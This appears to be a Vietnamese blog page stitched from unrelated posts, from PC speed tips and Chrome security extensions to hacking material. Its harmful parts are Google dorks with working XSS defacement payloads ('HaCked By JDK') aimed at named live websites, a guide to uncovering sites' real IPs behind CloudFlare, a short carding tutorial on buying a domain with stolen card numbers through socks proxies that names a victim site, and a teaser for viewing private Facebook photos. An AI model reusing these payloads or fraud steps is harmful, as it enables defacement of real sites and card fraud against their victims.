Khi bạn điều hướng Windows Task Manager và Resource Monitor, bạn có thể nhận thấy một số chương trình luôn khởi động cùng với máy tính của bạn. Đôi khi không phải lúc nào bạn cũng sử dụng, và bạn không cần nó bật 24/24.

Ví dụ Dropbox tiêu thụ khoảng 85MB bộ nhớ trên máy tính của tôi, nhưng tôi chỉ sử dụng nó đôi lúc cần thiết. Chạy nó 24/7 khá lãng phí.

Bạn có thể gỡ bỏ cài đặt một chương trình vi phạm, tuy nhiên cách làm đó không thông minh. Vì bạn vẫn cần sử dụng chúng . Vì thế hãy cài đặt không cho chúng khởi động cùng Windows.

Cài đặt bộ nhớ RAM Cleaner
Thay vì dùng Windows Task Manager để theo dõi bộ nhớ RAM đang hoạt động, bạn có thể thử cài đặt một chương trình “dọn dẹp RAM” của bạn.

Một số ứng dụng tốt Cleanmen, Minimem and Super Memory Cleaner (cho máy Mac).

Tuy nhiên, các công cụ này đem lại hiệu quả không thực sự rõ ràng. Trong khi một số người dùng đã báo cáo thành công, những người khác đã không thấy một sự cải tiến với một cái gọi là làm sạch.

Thêm RAM
Các cách xử lý trên chỉ có tác dụng hỗ trợ phần nào. Để giải quyết một cách triệt để bạn cần nâng cấp RAM, bằng cách thêm thanh RAM hoặc dùng thanh có dung lượng cao hơn.

Đầu tiên bạn cần xác định loại bộ nhớ RAM máy tính của bạn sử dụng. Điều này có thể được thực hiện dễ dàng bằng cách tải về một công cụ kiểm tra phần cứng máy tính như CPU-Z .


Kết luận
Bộ nhớ RAM ảnh hưởng rất nhiều tới hiệu suất sử dụng máy tính của bạn. Tuy nhiên, hãy xem xét thật kỹ lưỡng rằng máy tính đang chậm do lý do chính xác là gì? Sau đó hãy nghĩ đến việc mua và nâng cấp RAM cho máy.

5 Extensions Google Chrome Sẽ Bảo Vệ Bạn Trước Các Mối Nguy Hiểm Từ Internet

Vấn đề an toàn, bảo mật thông tin cá nhân trên Internet đang trở nên rất "nóng" và các Extension thiên về bảo mật cho Chrome là điều cần thiết. Các tiện ích nếu sử dụng riêng thì nó sẽ không phát huy hết tác dụng và có thể sẽ không hoàn hảo cho việc bảo vệ và tăng tính bảo mật cho Chrome, nhưng nếu chúng kết hợp lại nó sẽ bảo vệ bạn hoàn hảo trước những hiểm họa từ Internet khi duyệt web.

1. Click&Clean
Click&Clean là một extension dễ sử dụng, có chức năng giống như một phần mềm dọn rác hệ thống. Extension này sẽ giúp bạn giấu hoặc giữ các thông tin cá nhân, lịch sử duyệt web từ các bên theo dõi và thu thập thông tin.

Các chức năng chính của Click&Clean: Quét malware trên máy tính, xóa các file tạm, xóa lịch sử duyệt web, dọn dẹp cookies và bộ nhớ đệm,...

2. Personal BlocklistPersonal Blocklist là Extension này sẽ giúp bạn chặn các website cụ thể hoặc các tên miền xuất hiện trong kết quả tìm kiếm của bạn. Khi bạn khóa hoặc mở khóa thì các địa chỉ web hoặc tên miền này sẽ lập tức không xuất hiện trong các kết quả tìm kiếm nữa, giúp bạn không bị phân tâm bởi các địa chỉ này.

3. HTTPS EverywhereHTTPS Everywhere là một extension quan trọng nếu bạn quan tâm tới tính bảo mật thông tin của mình. Extension này sẽ mã hóa thông tin khi bạn truy cập vào các trang web, khiến trình duyệt Chrome trở nên an toàn hơn nhiều bằng việc tự động chuyển giao thức "http" thành "https".

4. Web Of Trust (WOT)Web Of Trust là một extension giúp bạn kiểm tra xem một địa chỉ web có an toàn không dựa trên các phản hồi đánh giá của người dùng khác. Ở đây có 3 mức độ chủ yếu : xanh - an toàn, vàng - nghi ngờ hoặc chưa chắc chắn, đỏ - nguy hiểm.

Để sử dụng extension này thì bạn cần phải đăng ký một tài khoản, việc tạo tài khoản rất nhanh chóng và hoàn toàn miễn phí.

5. Script Defender
Script Defender là một extension cho phép bạn chặn các đoạn mã, plugin bạn không thích và các thành phần gây khó chịu khác của trang web. Việc ngăn chặn này sẽ giúp máy tính của bạn an toàn trước các adware độc hại.

\

Truy tìm “kẻ” làm cho Windows khởi động chậm

Quá trình khởi động “chậm như rùa” của Windows đôi khi có thể bắt nguồn từ phần cứng như ổ cứng bị lỗi, tuy nhiên, các chương trình cài đặt trên máy khởi động cùng lúc với Windows lại là nguyên nhân chính của vấn đề này.

Thông thường sau khi cài đặt Windows, bạn sẽ phải cài đặt thêm nhiều chương trình khác để sử dụng, nhiều chương trình trong số đó tự động thêm vào danh sách khởi động cùng Windows mà bạn không hề biết. Như vậy khi thấy Windows khởi động chậm hơn bình thường, bạn nên tìm hiểu xem “kẻ” đã và đang gây ra sự chậm chạp này là ai? Dưới đây là cách để có thể tối đa hóa thời gian khởi động của Windows bằng chính công cụ tích hợp.

Windows 8.1
Tương tự như các phiên bản Windows trước đây, chức năng Task Manager vẫn được duy trì trên Windows 8 nhưng đã được thiết kế lại về giao diện và cung cấp nhiều tính năng hơn. Trong đó đặc biệt phải kể đến tính năng quản lý các phần mềm khởi động cùng hệ thống. Để truy cập vào Task Manager, nhấn tổ hợp phímControl+Alt+Delete trên bàn phím, rồi chọn Task Manager trong các tuỳ chọn xuất hiện.

Nếu như đang ở màn hình Start, bạn sẽ được chuyển sang giao diện desktop. Bên trong cửa sổ Task Manager,chọn thẻ Startup. Tây đây sẽ xuất hiện danh sách các chương trình sẽ khởi động cùng Windows.

Trong đó đáng chú ý là cột Startup impact, cột này sẽ hiện thị chính xác nhất những chương trình nào tác động đến tốc độ khởi động của phần mềm đối với hệ thống và được phân loại thành 4 nhóm gồm Hight, Medium, Low và Not Measured. Trong đó, cần phải lưu ý nhất là những chương trình được đánh giá ở mức cao (Hight), đó sẽ là những chương trình cần phải xem xét đến việc vô hiệu hóa chúng.

Việc lựa chọn vô hiệu hoá hoặc giữ lại chương trình khởi động cùng Windows cũng không khó khăn nhiều và chủ yếu phụ thuộc vào nhu cầu sử dụng của mỗi cá nhân. Ví dụ các chương trình như Google Chrome, Google Music Manager, BitTorrent Sync, MP3 Skype Recorder hay BlueStacks... là những chương trình mà không phải lúc nào bạn cũng phải sử dụng, trong khi chúng là được ưu tiên ở mức cao (Hight) khi khởi động cùng Windows, do đó hoàn toàn dễ hiểu khi chúng làm cho Windows khởi động chậm hơn đáng kể so với lúc đầu.

Nhưng quan trọng hơn là bạn không thể vô hiệu hóa các công cụ làm việc ở chế độ nền của một nhà sản xuất phần cứng như Intel hoặc một công cụ chống virus.

Windows 7
Điều đầu tiên mà người dùng Windows 7 cần làm là truy cập vào menu Start > Startup để xem có các ứng dụng của bên thứ ba có khả năng kích hoạt cùng Windows hay không? Nếu thấy bất cứ chương trình nào ở đây mà bạn không muốn chúng khởi động cùng Windows, chỉ cần kích chuột phải vào tên của chương trình đó rồi chọn Delete.

Một lựa chọn khác để bạn có thể truy cập vào danh sách các chương trình khởi động cùng Windows là thông qua công cụ System Configuration. Để truy cập vào công cụ này, truy cập vào menu Start > Run (hoặc bấm tổ hợp phím Windows+R), gõ lệnh msconfig vào khung trống rồi nhấn Enter. Trong cửa sổ System Configurationxuất hiện, chọn thẻ Startup.

Không giống như Windows 8.1, phương pháp tiếp cận với các chương trình khởi động cùng hệ thống trên Windows 7 ít thân thiện hơn và không có các thông tin tác động đến quá trình khởi động. Điều này thực sự làm cho người dùng ít kinh nghiệm khó có thể lựa chọn đâu là chương trình cần vô hiệu hoá và đâu là chương trình để lại.

Tuy nhiên, nếu bạn thấy các chương trình như Google Chrome, QuickTime hay Skype trong danh sách, thì có thể vô hiệu hoá chúng bằng cách tích bỏ tuỳ chọn trước tên của chương trình đó. Giải pháp này sẽ ngăn chặn các chương trình “chen chân” khởi động cùng Windows, do đó sẽ làm tăng đáng kể thời gian hệ thống khởi động.

Xem ảnh đại diện "Only Me" của bất kỳ ai trên Facebook

Facebook Profile Picture

Như bạn đã biết thì hiện tại Facebook cho phép người dùng thiết lập quyền riêng tư ngay trên hình đại diện. Nếu như chọn chế độ "Chỉ mình tôi" (Only me) thì những người dùng khác không thể nhấn vào ảnh đại diện để mở trong trình xem ảnh của Facebook, điều này có nghĩa rằng bạn không thể xem ảnh kích cỡ gốc của họ.

ĐỌC TIẾP »

PARSADEV CMS XSS Vulnerability

Dork: Powered by PARSADEV

Path:

Domain/?c=search&a=XSS Script

Demo:

http://techmart.ir/en/?c=search&a=%22%3E%3Ch1%3EHaCked%20By%20JDK%3C/h1%3E

Ahrareandeysheh CMS XSS Vulnerability

Dork: inurl:search.php?varsearch=

Path:

Domain/search.php?varsearch=XSS Script

Demo:

http://sabernews.com/search.php?varsearch=%22%3E%3Cmarquee%3E%3Ch1%3EHaCked%20By%20JDK%3C/h1%3E%3C/marquee%3E

http://atabatnews.ir/search.php?varsearch=%22%3E%3Ch1%3EHaCked%20By%20JDK%3C/h1%3E

Douran Portal XSS Vulnerability

Dork:
inurl:/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=

or

"DOURAN Portal"

Path:

Domain/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3Cmarquee%3E%3Ch1%3EHaCked By JDK%3C/h1%3E%3C/marquee%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True

Demo:

http://www.fums.ac.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3Cmarquee%3E%3Ch1%3EHaCked%20By%20JDK%3C/h1%3E%3C/marquee%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True

http://www.tehranbtc.ir/DesktopModules/Slider/Handlers/Slider.ashx?ModuleID=15246&Width=960&Height=180&TT=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3Cmarquee%3E%3Ch1%3EHaCked%20By%20JDK%3C/h1%3E%3C/marquee%3E&TDU=2&TDE=2&Auto=true&Stop=true&Loop=false&Bullets=true&Captions=false&CaptionEffect=move&Controls=true&Theme=Quiet&RTL=True

Lỗ hổng cho phép Hacker xóa bất kỳ Album ảnh nào trên Facebook

Hacking Facebook Albums

Một lỗ hổng nghiêm trọng trong Facebook mới được báo cáo, lỗ hổng này cho phép bất kỳ ai cũng có thể xóa toàn bộ Album ảnh của bạn mà không cần chứng thực.

Nhà nghiên cứu bảo mật Laxman Muthiyah cho biết rằng lỗ hổng thực sự nằm ở cơ chế hoạt động của Facebook Graph API - cho phép "một hacker xóa bất kỳ album ảnh nào trên Facebook. Bất kỳ album ảnh sở hữu bởi một người dùng, một trang hoặc một nhóm đều có thể bị xóa".


ĐỌC TIẾP »

Bypass CloudFlare

Với một số website, chưa thực sự “config” tốt việc ẩn IP qua cloudflare thì việc tìm IP thật rất đơn giản với script cloudflare-ip. Nếu bạn muốn ẩn IP hoàn toàn cho website của mình, hãy dùng tiện ích này để check, dựa vào kết quả script mà bạn biết được mình config còn “lộ” ở công đoạn nào để khắc phục.

Tools này chỉ chạy trên hệ điều hành Linux và trên SSH. Bạn có thể chạy trên VPS hoặc máy tính của mình. Sau đây là cách thực hiện:

1. Dùng lệnh cd đến folder muốn chứa cloudflare-ip

2. Download và chmod cloudflare-ip script

wget https://github.com/niravkdesai/cloudflare-ip/archive/master.zip
unzip master.zip
chmod +x cloudflare-ip.sh

* Chú ý: Nếu tập tin tải về có tên là master chứ không phải là master.zip thì đổi tên thành master.zip rồi mới chạy lệnh unzip

3. Chạy cloudflare-ip

./cloudflare-ip.sh

Bạn điền website muốn check rồi nhần Enter. Tiếp theo chọn 1 trong 3 option của cloudflare-ip

(1)Some KNOWN D.N.S bruteforce

(2)Using nmap

(3)Netcraft toolbar history

Nếu 1 option ra được thì thôi, chưa check được thì dùng 2 option còn lại. Script sẽ cho kết quả vào out.txt trong thư mục chứa script. Bạn kiểm tra kết quả trong đó nhé.

Quỷ Lệ VHB's Blog

Anonymous tuyên bố đánh sập tài khoản Twitter và Facebook của IS

Nhóm tin tặc Anonymous đã tung ra một cảnh báo nhắm tới nhóm khủng bố Nhà nước Hồi giáo tự xưng IS thông qua một video đăng tải trên YouTube, tuyên bố đánh sập các tài khoản Twitter và Facebook dùng để tuyên truyền và chiêu mộ thành viên mới của tổ chức này.

Thông điệp cảnh báo được gửi qua đoạn video: "ISIS, bọn ta sẽ truy lùng, đánh sập các trang web, tài khoản mạng xã hội, email và vạch trần bộ mặt thật của các người".

Vào tháng trước, sau vụ tấn công tòa soạn tuần báo châm biếm Charlie Hebdo ở thủ đô Paris của Pháp ngày 7/1, khiến 12 người chết, lần đầu tiên Anonymous "tuyên chiến" với IS (nhà nước Hồi giáo cực đoan) trên các trang web của tổ chức này.

Trong video mới nhất chỉ kéo dài hơn hai phút này, nhóm tin tặc Anonymous đã tuyên bố kế hoạch tấn công ISIS vẫn đang tiếp tục diễn ra. Nhóm tự mô tả gồm nhiều thành phần từ người Hồi giáo, Thiên chúa giáo đến người Do Thái, là những tin tặc, những kẻ lừa đảo, gián điệp… đến từ tất cả các chủng tộc, tôn giáo, quốc gia, lãnh thổ. Ngoài ra, nhóm cũng tự tuyên bố lý tưởng hành động nhằm bảo vệ nền dân chủ.

Họ nhấn mạnh: "Hãy nhớ rằng những phần tử khủng bố tự xưng Nhà nước Hồi giáo IS không phải là những người Hồi giáo thực sự".
Theo The Hacker News, Anonymous đã công bố trên 100 tài khoản Twitter và Facebook nghi ngờ thuộc về đội quân Nhà nước Hồi giáo IS. Trong đoạn video đăng tải trên YouTube, nhóm tin tặc này đã trích dẫn đường link những tài khoản của IS bị đánh sập trong phần mô tả phía dưới video.

Đoạn video kết thúc với tuyên bố: "ISIS bọn ta là Anonymous, bọn ta là cả một đội quân hùng hậu, bọn ta không tha thứ, bọn ta không quên, hãy chờ đấy".

Dưới đây là video của nhóm Anonymous

1 Số tài khoản Twitter và Facebook đã bị Anonymous đánh sập 

Twitter

https://twitter.com/Daash
https://twitter.com/DaashISIS
https://twitter.com/DaashConnect
https://twitter.com/DaashConnect1
https://twitter.com/DaashConnect2
https://twitter.com/DaashConnect3
https://twitter.com/DaashConnect4
https://twitter.com/DaashConnect5
https://twitter.com/DaashConnect6
https://twitter.com/DaashConnect7
https://twitter.com/DaashConnect8
https://twitter.com/DaashISIS
https://twitter.com/ISISConnect
https://twitter.com/ISISConnect2
https://twitter.com/ISISConnect3
https://twitter.com/ISIS_Connect
https://twitter.com/D3ichy1
https://twitter.com/Nour_zalam
https://twitter.com/fadou7_ilma3bar
https://twitter.com/Faysal_da3iche
https://twitter.com/sam7anA7mar
https://twitter.com/Salman7asoun
https://twitter.com/far7at_naser_3
https://twitter.com/Asad3oumran
https://twitter.com/AbouHilal_bader
https://twitter.com/Abou7amadElrasy
https://twitter.com/Dafiq_ISIS
https://twitter.com/Salman_Anwar
https://twitter.com/Jazib_moutawakil
https://twitter.com/Albakistani_JN
https://twitter.com/umar_media_ttp
https://twitter.com/Din1080
https://twitter.com/abu_elbaraa91
https://twitter.com/Din1080
https://twitter.com/ZawahiriRafidhi
https://twitter.com/interditAuPaien
https://twitter.com/Qan9Yaman
https://twitter.com/Abouyamany
https://twitter.com/AlRani1
https://twitter.com/AMouwahidin
https://twitter.com/AbouMoustapha1
https://twitter.com/Abou_illabaisse
https://twitter.com/Ja3faralsadik
https://twitter.com/E7sanALsadiq
https://twitter.com/Ja3far_aboumahdi
https://twitter.com/imam_3antar
https://twitter.com/AbuBicha
https://twitter.com/OumShaheed1
https://twitter.com/aboomusab69
https://twitter.com/riahizaid12
https://twitter.com/Khaled_nousra
https://twitter.com/MouvementSalafi
https://twitter.com/akhypotteur
https://twitter.com/Dz_Bara_ah
https://twitter.com/UmmSherazzade
https://twitter.com/Salam_nour
https://twitter.com/Abou_OmarAlchamy
https://twitter.com/Abou_jabal
https://twitter.com/Baghdadid1
https://twitter.com/Ra2if_w
https://twitter.com/Amin_3abdala
https://twitter.com/Qouyas7
https://twitter.com/zalmour_3aziz
https://twitter.com/karkhan_el_nour
https://twitter.com/Barlous_3antar
https://twitter.com/karim_soura
https://twitter.com/SrhZtn
https://twitter.com/Monimelperso
https://twitter.com/Abounizar_sadim
https://twitter.com/AbouNasir_nousra
https://twitter.com/khalid_da3ichy
https://twitter.com/Mouhran_salam_alah
https://twitter.com/Mounir3abed_nousra
https://twitter.com/MinhajNoubouwa
https://twitter.com/abou_suisse
https://twitter.com/dawlaReporter
https://twitter.com/FatimaYouYouu
https://twitter.com/Nour_Da3ich
https://twitter.com/aylan7x
https://twitter.com/Parigi6
https://twitter.com/moujahidardent
https://twitter.com/patience1900
https://twitter.com/alfuratwadijlah
https://twitter.com/CassKhattab
https://twitter.com/ibnhouss > Rachid Abou Houdeyfa
https://twitter.com/aboushaheed_
https://twitter.com/abubakr99amb
https://twitter.com/Salashh
https://twitter.com/jamilnousran
https://twitter.com/jamilnousran1

Facebook

https://www.facebook.com/buxy.bux

https://www.facebook.com/profile.php?id=100007817504822

Các tài khoản khác: http://pastebin.com/G663HnDa

“CyberCaliphate” đe dọa gia đình Tổng thống Obama

Giao diện trang Twitter của báo Newsweek bị tin tặc chiếm giữ.

Theo Reuters, ngày 10/2, các tin tặc tự xưng là nhóm CyberCaliphate đã đe dọa Tổng thống Mỹ Barack Obama và gia đình khi chúng giành quyền kiểm soát tài khoản mạng xã hội Twitter của tạp chí Newsweek và đăng tải thông điệp “Tôi là IS” - một khẩu hiệu ám chỉ nhóm Nhà nước Hồi giáo (IS) tự xưng và cuộc tấn công đẫm máu nhằm vào tòa soạn báo Charlie Hebdo của Pháp.

Nhóm tin tặc trên, từng tuyên bố tiến hành vụ tấn công các tài khoản mạng xã hội của Lầu Năm Góc hồi tháng trước, đã cho chạy dòng chữ “Ngày Valentine đẫm máu cùng CyberCaliphate. Michelle Obama (phu nhân Tổng thống Obama)! chúng tôi đang theo dõi bà, con gái và chồng bà.”

Tạp chí Newsweek sau đó đã gỡ bỏ biểu ngữ "CyberCaliphate" và giành lại quyền kiểm soát mạng Twitter trong vòng 14 phút. Nhà Trắng cho biết Cục Điều tra Liên bang (FBI) đang điều tra vụ việc./.

[AutoIt] Viết ứng dụng với Pastebin API

Pastebin API Tutorial

Hướng dẫn viết ứng dụng AutoIt với Pastebin API gồm các chức năng được hỗ trợ như: tạo paste với tùy chọn về ngôn ngữ, thiết lập riêng tư và ngày hết hạn.


ĐỌC TIẾP »

[TUT UG] Domain CCN CCV 2015

Nguyên Liệu : CCV or CCN mình dùng ccv exp 2/2015 qua luôn
Mail : từ lưa mình dùng hotmail
Sock : us trùng stt càng tốt
Time : 24/24h

Victim:

http://speednames.com

VNZNO1

Tạo bản quyền đơn giản cho phần mềm sử dụng PHP

Bản quyền phần mềm

Hướng dẫn tạo bản quyền đơn giản cho phần mềm, kết hợp giữa AutoIt và PHP. Các bạn có thể tải mã nguồn mẫu ở phía dưới video nhé.

ĐỌC TIẾP »

[J2TeaM] SQLMap GUI by Juno_okyo

GUI for SQLMap

Rảnh rỗi ngồi làm GUI cho SQLMap - một công cụ khai thác SQL Injection tự động. Nếu chưa biết SQLMap thì bạn có thể xem qua bài viết "Kiểm thử tấn công SQL Injection với DVWA và SQLMap".

ĐỌC TIẾP »